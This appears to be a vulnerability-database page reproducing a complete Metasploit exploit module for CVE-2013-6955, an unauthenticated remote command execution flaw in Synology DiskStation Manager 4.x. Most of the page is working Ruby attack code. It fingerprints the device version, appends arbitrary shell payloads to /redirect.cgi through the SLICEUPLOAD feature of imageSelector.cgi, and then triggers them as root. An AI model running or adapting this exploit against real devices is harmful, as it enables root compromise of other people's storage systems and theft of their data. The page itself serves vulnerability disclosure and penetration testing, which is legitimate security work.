Synology DiskStation Manager SLICEUPLOAD Remote Command Execution

🗓️ 23 Dec 2013 00:00:00Reported by Markus WulftangeType

packetstorm🔗 packetstormsecurity.com👁 54 Views

Synology DiskStation Manager vulnerability allows remote command executio

Reporter	Title	Published	Views	Family All 18
0day.today	Synology DiskStation Manager SLICEUPLOAD Remote Command Execution	24 Dec 201300:00	–	zdt
Circl	CVE-2013-6955	24 Dec 201300:00	–	circl
Check Point Advisories	Synology DiskStation Manager SLICEUPLOAD Code Execution (CVE-2013-6955)	7 May 201400:00	–	checkpoint_advisories
CVE	CVE-2013-6955	9 Jan 201411:00	–	cve
Cvelist	CVE-2013-6955	9 Jan 201411:00	–	cvelist
Exploit DB	Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)	24 Dec 201300:00	–	exploitdb
Metasploit	Synology DiskStation Manager SLICEUPLOAD Remote Command Execution	20 Dec 201315:45	–	metasploit
NVD	CVE-2013-6955	9 Jan 201418:07	–	nvd
OpenVAS	Synology DiskStation Manager (DSM) 'imageSelector.cgi' RCE Vulnerability - Active Check	7 Jan 201400:00	–	openvas
Prion	Design/Logic Flaw	9 Jan 201418:07	–	prion

`##  
## This module requires Metasploit: http//metasploit.com/download  
## Current source: https://github.com/rapid7/metasploit-framework  
###  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)  
&junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",  
'Description' => %q{  
This module exploits a vulnerability found in Synology DiskStation Manager (DSM)  
versions 4.x, which allows the execution of arbitrary commands under root  
privileges.  
The vulnerability is located in /webman/imageSelector.cgi, which allows to append  
arbitrary data to a given file using a so called SLICEUPLOAD functionality, which  
can be triggered by an unauthenticated user with a specially crafted HTTP request.  
This is exploited by this module to append the given commands to /redirect.cgi,  
which is a regular shell script file, and can be invoked with another HTTP request.  
Synology reported that the vulnerability has been fixed with versions 4.0-2259,  
4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.  
},  
'Author' =>  
[  
'Markus Wulftange' # Discovery, Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2013-6955' ],  
],  
'Privileged' => false,  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 0x31337,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl telnet',  
}  
},  
'Targets' =>  
[  
['Automatic', {}]  
],  
'DefaultTarget' => 0,  
'License' => MSF_LICENSE,  
'DisclosureDate' => 'Oct 31 2013'  
))  
  
register_options(  
[  
Opt::RPORT(5000)  
], self.class)  
end  
  
def check  
print_status("#{peer} - Trying to detect installed version")  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri('webman', 'info.cgi'),  
'vars_get' => { 'host' => ''}  
})  
  
if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN  
version = "#{$~[:major]}.#{$~[:minor]}"  
build = $~[:build]  
model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase }  
model = "DS#{model}" unless model =~ /^[A-Z]/  
else  
print_status("#{peer} - Detection failed")  
return Exploit::CheckCode::Unknown  
end  
  
print_status("#{peer} - Model #{model} with version #{version}-#{build} detected")  
  
case version  
when '4.0'  
return Exploit::CheckCode::Vulnerable if build < '2259'  
when '4.1'  
return Exploit::CheckCode::Vulnerable  
when '4.2'  
return Exploit::CheckCode::Vulnerable if build < '3243'  
when '4.3'  
return Exploit::CheckCode::Vulnerable if build < '3810'  
return Exploit::CheckCode::Detected if build == '3810'  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
cmds = [  
# sed is used to restore the redirect.cgi  
"sed -i -e '/sed -i -e/,$d' /usr/syno/synoman/redirect.cgi",  
payload.encoded  
].join("\n")  
  
mime_msg = Rex::MIME::Message.new  
mime_msg.add_part('login', nil, nil, 'form-data; name="source"')  
mime_msg.add_part('logo', nil, nil, 'form-data; name="type"')  
  
# unfortunately, Rex::MIME::Message canonicalizes line breaks to \r\n,  
# so we use a placeholder and replace it later  
cmd_placeholder = Rex::Text::rand_text_alphanumeric(10)  
mime_msg.add_part(cmd_placeholder, 'application/octet-stream', nil,  
'form-data; name="foo"; filename="bar"')  
  
post_body = mime_msg.to_s  
post_body.strip!  
post_body.sub!(cmd_placeholder, cmds)  
  
# fix multipart encoding  
post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1')  
  
# send request to append shell commands  
print_status("#{peer} - Injecting the payload...")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri('webman', 'imageSelector.cgi'),  
'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}",  
'headers' => {  
'X-TYPE-NAME' => 'SLICEUPLOAD',  
'X-TMP-FILE' => '/usr/syno/synoman/redirect.cgi'  
},  
'data' => post_body  
})  
  
unless res and res.code == 200 and res.body.include?('error_noprivilege')  
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")  
end  
  
# send request to invoke the injected shell commands  
print_status("#{peer} - Executing the payload...")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri('redirect.cgi'),  
})  
  
# Read command output if cmd/unix/generic payload was used  
if datastore['CMD']  
unless res and res.code == 200  
fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")  
end  
  
print_good("#{peer} - Command successfully executed")  
print_line(res.body)  
end  
end  
end  
  
`

23 Dec 2013 00:00Current

0.7Low risk

Vulners AI Score0.7

EPSS0.83314